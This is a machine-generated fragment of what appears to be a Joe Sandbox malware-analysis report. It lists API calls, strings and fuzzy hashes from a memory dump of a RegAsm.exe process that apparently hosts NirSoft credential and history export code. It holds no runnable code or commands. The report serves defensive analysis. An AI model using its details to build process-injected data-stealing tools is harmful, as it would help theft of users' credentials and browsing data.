                                                                                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                        • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                      • free.MSVCRT ref: 0040E49A
                                                                                                                                                                        • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                      • memset.MSVCRT ref: 0040E380
                                                                                                                                                                        • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                        • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                      • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                      • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                      • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                      • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                      • API String ID: 3849927982-2252543386
                                                                                                                                                                      • Opcode ID: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                      • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                      • Opcode Fuzzy Hash: f8736963c1e408997af279cfc298981fa7ef611c2197f5f9bddedf84c8b339a3
                                                                                                                                                                      • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                                                                                      • Opcode ID: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                      • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                      • Opcode Fuzzy Hash: 79e099bb23a1393a239ae01641405c8b767ccdf12231d4bb76dd8066c9d8bd92
                                                                                                                                                                      • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 004091E2
                                                                                                                                                                        • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                      • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                      • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                      • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                      • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                      • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                      • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                      • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3715365532-3916222277
                                                                                                                                                                      • Opcode ID: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                      • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                      • Opcode Fuzzy Hash: f920f79086ebd03163bb660580745ba542768fbf6859bbba0dc8aac637b41020
                                                                                                                                                                      • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                      • String ID: ---
                                                                                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                                                                                      • Opcode ID: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                      • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                      • Opcode Fuzzy Hash: deb32149b504d539516d0f42eccfd95bc3c0c038ac4760bb164b185877a325eb
                                                                                                                                                                      • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1010922700-0
                                                                                                                                                                      • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                      • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                      • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                      • String ID: |A
                                                                                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                                                                                      • Opcode ID: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                      • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                      • Opcode Fuzzy Hash: 539f2c4f40ac40545d02d8778def220405c4216a3daad879b42070153127b3fe
                                                                                                                                                                      • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _wcsicmp
                                                                                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                                                                                      • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                      • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                      • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                      • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1700100422-0
                                                                                                                                                                      • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                      • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                      • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                      • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 552707033-0
                                                                                                                                                                      • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                      • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$_snwprintf
                                                                                                                                                                      • String ID: %%0.%df
                                                                                                                                                                      • API String ID: 3473751417-763548558
                                                                                                                                                                      • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                      • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                      • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                      • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                      • String ID: A
                                                                                                                                                                      • API String ID: 2892645895-3554254475
                                                                                                                                                                      • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                      • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                      • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                      APIs
                                                                                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                                                                                      • String ID: caption
                                                                                                                                                                      • API String ID: 973020956-4135340389
                                                                                                                                                                      • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                      • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                                                                                                                      • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                                                                                                                      • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                                                                                      • API String ID: 1283228442-2366825230
                                                                                                                                                                      • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                      • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                                                                                                                      • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                                                                                                                      APIs
                                                                                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                                                                      • String ID: \systemroot
                                                                                                                                                                      • API String ID: 4173585201-1821301763
                                                                                                                                                                      • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                      • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                                                                                                                      • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                                                                                                                      • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000014.00000002.496163368.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: HandleModule
